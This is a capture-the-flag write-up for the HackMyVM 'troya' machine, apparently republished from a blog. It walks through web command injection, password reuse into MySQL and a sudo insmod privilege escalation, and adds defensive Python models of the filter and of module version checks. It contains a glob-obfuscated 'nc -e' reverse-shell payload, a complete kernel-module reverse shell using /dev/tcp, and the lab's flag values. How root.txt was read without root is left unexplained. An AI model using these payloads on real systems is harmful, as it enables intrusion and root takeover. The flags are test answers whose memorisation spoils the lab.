hackmyvm-troya
ssh://192.168.69.24 ssh ProductName:OpenSSH,Length:41,Port:22,Version:7.9p1Debian10+deb10u2,OperatingSystem:Linux,Digest:SSH-2.0-OpenSSH_7.9p1De,Info:protocol2.0
http://192.168.69.24 Port:80,Digest:ip:<inputtype="text",Length:271
Opening the site shows an input that looks like an RCE entry point (you give it an IP address and it runs a command with it).
There is a WAF in front of it that needs to be bypassed. The payload below got through; the ? wildcards are resolved by the target's shell, so /b?n/b??? expands to /bin/bash without that literal path ever appearing in the request:
127.0.0.1|nc -e /b?n/b??? 192.168.69.1 12345
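The bypass above is easier to reason about with a model of the filter in front of it. The following is an added example, not code from the original post: it reproduces a blacklist filter with the characters the post names, shows that the pipe-plus-glob payload passes it and what the shell does with the glob, and puts a hardened handler (allow-list parse as an IP address, argv execution without a shell) next to it. The `ping -c 1` command template, the function names and the fake filesystem are assumptions made for this demonstration.

```python
"""Added example, not code from the original post: a model of the form's
blacklist filter, why the pipe-plus-glob payload slips past it, and a
hardened replacement. The blacklist characters are the ones the post names;
the 'ping -c 1' template, the function names and the fake filesystem are
assumptions made for this demonstration."""
import glob
import ipaddress
import os
import subprocess
import sys
import tempfile

PAYLOAD = "127.0.0.1|nc -e /b?n/b??? 192.168.69.1 12345"

# The characters the post says the form rejects. Note what is NOT here:
# '|', '&', '$', '`', '?', '*' and spaces all reach the shell untouched.
BLACKLIST = frozenset('"%;<>^')


def waf_allows(user_input: str) -> bool:
    """Blacklist check as described: True means the input reaches the shell."""
    return not any(ch in BLACKLIST for ch in user_input)


def vulnerable_command(user_input: str) -> str:
    """The injection pattern: user input spliced into a shell command line
    (assumed template; the post does not show the exact PHP)."""
    return "ping -c 1 " + user_input


def make_fake_root() -> str:
    """Constructed directory tree standing in for the target's / so the glob
    can be resolved offline."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "bin"))
    for name in ("bash", "bzip2", "ls"):
        open(os.path.join(root, "bin", name), "w").close()
    return root


def expand_like_shell(pattern: str, root: str) -> list:
    """Expand an absolute glob pattern the way the shell would, relative to root.
    '/b?n/b???' matches 'bin/bash' but not 'bin/bzip2' (five characters)."""
    matches = glob.glob(os.path.join(root, pattern.lstrip("/")))
    return sorted(os.path.relpath(m, root) for m in matches)


def run_without_shell(argument: str) -> str:
    """With shell=False, metacharacters are ordinary bytes in one argv entry:
    the payload comes back verbatim instead of spawning nc."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", argument],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def safe_ping_argv(user_input: str) -> list:
    """Hardened version: allow-list (parse as an IP address) instead of a
    blacklist, then build argv for shell-free execution. Raises ValueError on
    anything that is not a bare IP, so the payload never reaches a shell."""
    addr = ipaddress.ip_address(user_input.strip())
    return ["ping", "-c", "1", str(addr)]


def rejected_by_allowlist(user_input: str) -> bool:
    """True if the hardened handler refuses the input."""
    try:
        safe_ping_argv(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("WAF lets payload through:", waf_allows(PAYLOAD))
    print("shell line executed:", vulnerable_command(PAYLOAD))
    print("/b?n/b??? expands to:", expand_like_shell("/b?n/b???", make_fake_root()))
    print("argv without shell:", repr(run_without_shell(PAYLOAD)))
    print("hardened handler rejects payload:", rejected_by_allowlist(PAYLOAD))
    print("hardened handler accepts 127.0.0.1:", safe_ping_argv("127.0.0.1"))
```

The point of the last two functions is that blacklists lose by construction: the shell's own metacharacters and pathname expansion give more ways to spell a command than any list anticipates, whereas parsing the value as an IP and executing argv without a shell leaves nothing for the shell to expand.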
Once the reverse shell came back, there was a secret.pdf.
Its content: cGF6endvcmQK
Base64-decoded, that is pazzword
While here, also had a look at the source:
$output
Look at the home directories:
www-data@troya:/home$ ls -alt
total 20
drwxr-xr-x  3 helena helena 4096 Oct 22  2020 helena
drwxr-xr-x  5 root   root   4096 Oct 22  2020 .
drwxr-xr-x  2 hector hector 4096 Oct 22  2020 hector
drwxr-xr-x  2 paul   paul   4096 Oct 22  2020 paul
drwxr-xr-x 18 root   root   4096 Oct 22  2020 ..
www-data@troya:/home$ ls -alt helena/
total 28
drwxr-xr-x 3 helena helena 4096 Oct 22  2020 .
-rw------- 1 helena helena   11 Oct 22  2020 user.txt
drwxr-xr-x 3 helena helena 4096 Oct 22  2020 .local
-rw-r--r-- 1 helena helena  220 Oct 22  2020 .bash_logout
-rw-r--r-- 1 helena helena 3526 Oct 22  2020 .bashrc
-rw-r--r-- 1 helena helena  807 Oct 22  2020 .profile
drwxr-xr-x 5 root   root   4096 Oct 22  2020 ..
www-data@troya:/home$ ls -alt hector
total 20
drwxr-xr-x 5 root   root   4096 Oct 22  2020 ..
drwxr-xr-x 2 hector hector 4096 Oct 22  2020 .
-rw-r--r-- 1 hector hector  220 Oct 22  2020 .bash_logout
-rw-r--r-- 1 hector hector 3526 Oct 22  2020 .bashrc
-rw-r--r-- 1 hector hector  807 Oct 22  2020 .profile
www-data@troya:/home$ ls -alt paul
total 24
drwxr-xr-x 5 root root 4096 Oct 22  2020 ..
drwxr-xr-x 2 paul paul 4096 Oct 22  2020 .
-rw------- 1 paul paul   51 Oct 22  2020 .Xauthority
-rw-r--r-- 1 paul paul  220 Oct 22  2020 .bash_logout
-rw-r--r-- 1 paul paul 3526 Oct 22  2020 .bashrc
-rw-r--r-- 1 paul paul  807 Oct 22  2020 .profile
www-data@troya:/home$
The server also has MySQL running even though the website does not use it, so MySQL is probably a useful pivot. First try where pazzword works:
www-data@troya:/home$ su hector
Password: pazzword
su: Authentication failure
www-data@troya:/home$ su helena
Password: pazzword
su: Authentication failure
www-data@troya:/home$ su paul
Password: pazzword
su: Authentication failure
www-data@troya:/home$ mysql
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
www-data@troya:/home$ mysql -uroot
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
www-data@troya:/home$ mysql -uhector
ERROR 1045 (28000): Access denied for user 'hector'@'localhost' (using password: NO)
www-data@troya:/home$ mysql -uroot -p
Enter password: pazzword
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
www-data@troya:/home$ mysql -uhector -p
Enter password: pazzword
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 10.3.25-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
Confirmed: pazzword is hector's MySQL password. (The ERROR 1698 on root is different from the 1045 on the other users: on Debian's MariaDB the root account authenticates through unix_socket, so only the OS root user can log in as it and no password guess will ever work.)
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| yo                 |
+--------------------+
2 rows in set (0.005 sec)

MariaDB [(none)]> use yo
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [yo]> show tables;
+--------------+
| Tables_in_yo |
+--------------+
| lucky        |
+--------------+
1 row in set (0.002 sec)

MariaDB [yo]> select * from lucky;
+----+--------+--------------------+
| id | uzer   | pazz               |
+----+--------+--------------------+
|  1 | helena | iuyqwejkhdsaiuyewq |
+----+--------+--------------------+
1 row in set (0.002 sec)

MariaDB [yo]>
So MySQL gives up helena's password: iuyqwejkhdsaiuyewq
Logging in as helena works, and user.txt - pleasestop
helena@troya:~$ sudo -l
Matching Defaults entries for helena on troya:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User helena may run the following commands on troya:
    (ALL) NOPASSWD: /usr/sbin/insmod
helena@troya:~$
Privilege escalation through insmod takes more work.
insmod loads kernel modules, i.e. .ko files, and anything a module does runs in the kernel as root, so NOPASSWD insmod is effectively root.
The plan is to compile a .ko that spawns a reverse shell.
First install the build dependencies on the build box. The headers must be for exactly the target's kernel release (4.19.0-12-amd64 here): a module built against any other release is refused by the kernel at load time, because its vermagic string and exported-symbol CRCs will not match.
apt install linux-headers-4.19.0-12-amd64 linux-image-4.19.0-12-amd64 build-essential
// reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
#include <linux/init.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

/* Command the kernel runs as root via the usermode helper: a bash reverse shell to the attacker. */
static char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.69.1/9001 0>&1", NULL};
static char *envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

static int __init reverse_shell_init(void)
{
    int called;

    printk(KERN_INFO "Starting\n");
    /* UMH_WAIT_EXEC: return as soon as the helper has exec'd, do not wait for the shell to exit. */
    called = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "ret=%d\n", called);
    return called;
}

static void __exit reverse_shell_exit(void)
{
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Makefile (KVER defaults to the build box's own kernel; override it, e.g. make KVER=4.19.0-12-amd64, when building for a target running a different release)
KVER ?= $(shell uname -r)
KDIR ?= /lib/modules/$(KVER)/build

obj-m += reverse-shell.o

all:
	make -C $(KDIR) M=$(PWD) modules

clean:
	make -C $(KDIR) M=$(PWD) clean
Build it with make, copy reverse-shell.ko to the target, start a listener on 192.168.69.1 port 9001, and finally:
sudo insmod reverse-shell.ko
Loading the module fires the reverse shell, running as root.
However, be aware that the kernel version has to match. uname -a showed 4.19; I went through all of my VMs and none of them is 4.19, and I would have to set up a matching VM just to build this. Forget it, I just read root.txt directly - partyishard
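The version mismatch is cheap to detect before anything is copied to the target. The following is an added example, not code from the original post: it parses the vermagic line of `modinfo` output, compares its release part with the target's `uname -r`, checks that matching headers are installed under /lib/modules, and produces the `make` invocation that builds against the target's headers rather than the build box's own kernel. The modinfo text, the 4.19.0-12-amd64 release string and the fake /lib/modules tree are constructed here; the function names are chosen for this demonstration.

```python
"""Added example, not code from the original post: pre-flight checks that
catch the kernel version problem before building or loading the module.
The modinfo text and the /lib/modules layout are constructed; the function
names are chosen for this demonstration."""
import os
import tempfile

TARGET_KVER = "4.19.0-12-amd64"  # assumed uname -r on troya (the post says 4.19)

# Constructed `modinfo reverse-shell.ko` output for a module built on a
# build box running a different kernel than the target.
MODINFO_WRONG = """\
filename:       /tmp/reverse-shell.ko
version:        1.0
description:    LKM reverse shell module
author:         AttackDefense
license:        GPL
depends:
retpoline:      Y
name:           reverse_shell
vermagic:       5.10.0-8-amd64 SMP mod_unload modversions
"""
MODINFO_RIGHT = MODINFO_WRONG.replace("5.10.0-8-amd64", TARGET_KVER)


def parse_vermagic(modinfo_text: str) -> str:
    """Return the full vermagic string ('<release> <flags...>') or '' if absent."""
    for line in modinfo_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "vermagic":
            return value.strip()
    return ""


def vermagic_matches(modinfo_text: str, running_kver: str) -> bool:
    """In practice a module loads only if it was built against exactly the
    running release (otherwise insmod fails with 'Invalid module format');
    the release part of vermagic is the cheap way to check that up front."""
    magic = parse_vermagic(modinfo_text)
    return magic.split(" ", 1)[0] == running_kver


def headers_installed(kver: str, modules_root: str = "/lib/modules") -> bool:
    """kbuild needs /lib/modules/<kver>/build, provided by linux-headers-<kver>."""
    return os.path.isdir(os.path.join(modules_root, kver, "build"))


def plan_module_build(target_kver: str, modules_root: str = "/lib/modules") -> list:
    """Return the make invocation that builds against the TARGET's headers
    instead of the build box's `uname -r`; refuse if they are not installed."""
    if not headers_installed(target_kver, modules_root):
        raise FileNotFoundError(
            f"no headers for {target_kver}: apt install linux-headers-{target_kver}")
    kdir = os.path.join(modules_root, target_kver, "build")
    return ["make", "-C", kdir, "M=" + os.getcwd(), "modules"]


def make_fake_modules_root(kvers) -> str:
    """Constructed /lib/modules stand-in with a build/ dir for each release."""
    root = tempfile.mkdtemp()
    for k in kvers:
        os.makedirs(os.path.join(root, k, "build"))
    return root


if __name__ == "__main__":
    print("module from other kernel loads on target:", vermagic_matches(MODINFO_WRONG, TARGET_KVER))
    print("module built for target loads on target:", vermagic_matches(MODINFO_RIGHT, TARGET_KVER))
    fake = make_fake_modules_root([TARGET_KVER])
    print("build command:", " ".join(plan_module_build(TARGET_KVER, fake)))
```

Running the vermagic check against the real module is one `modinfo reverse-shell.ko` on the build box; the headers check is what decides whether the `apt install linux-headers-4.19.0-12-amd64` step above actually succeeded before any make is attempted.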
Summary:
- SSH service: ssh://192.168.69.24, OpenSSH 7.9p1 Debian 10, Linux.
- Web service: http://192.168.69.24 has a form suspected of RCE (takes an IP address and runs a command with it). After bypassing the WAF, 127.0.0.1|nc -e /b?n/b??? 192.168.69.1 12345 gives a reverse shell.
- Sensitive information disclosure: secret.pdf contains the Base64 string cGF6endvcmQK, which decodes to the password pazzword. That password logs in to MySQL as hector; database yo stores helena's password iuyqwejkhdsaiuyewq.
- Privilege escalation: logging in as helena with iuyqwejkhdsaiuyewq gives user.txt (pleasestop). helena may run /usr/sbin/insmod (kernel module loading) via sudo without a password. The plan was to compile a malicious kernel module (.ko) for privilege escalation, but it was not carried out because of the kernel version mismatch; root.txt (partyishard) was read directly.
- Key code: the web form's PHP has a command injection; a blacklist filters some special characters ("%;<>^ and the like), but the pipe character | gets through. The reverse-shell kernel module (C) and its Makefile are given above.
Conclusion: the attack path is web command injection → reverse shell → MySQL password disclosure → user helena → kernel module loading for root (not actually executed), ending with root.txt.
Originally published on the WeChat public account (BlueIris): hackmyvm-troya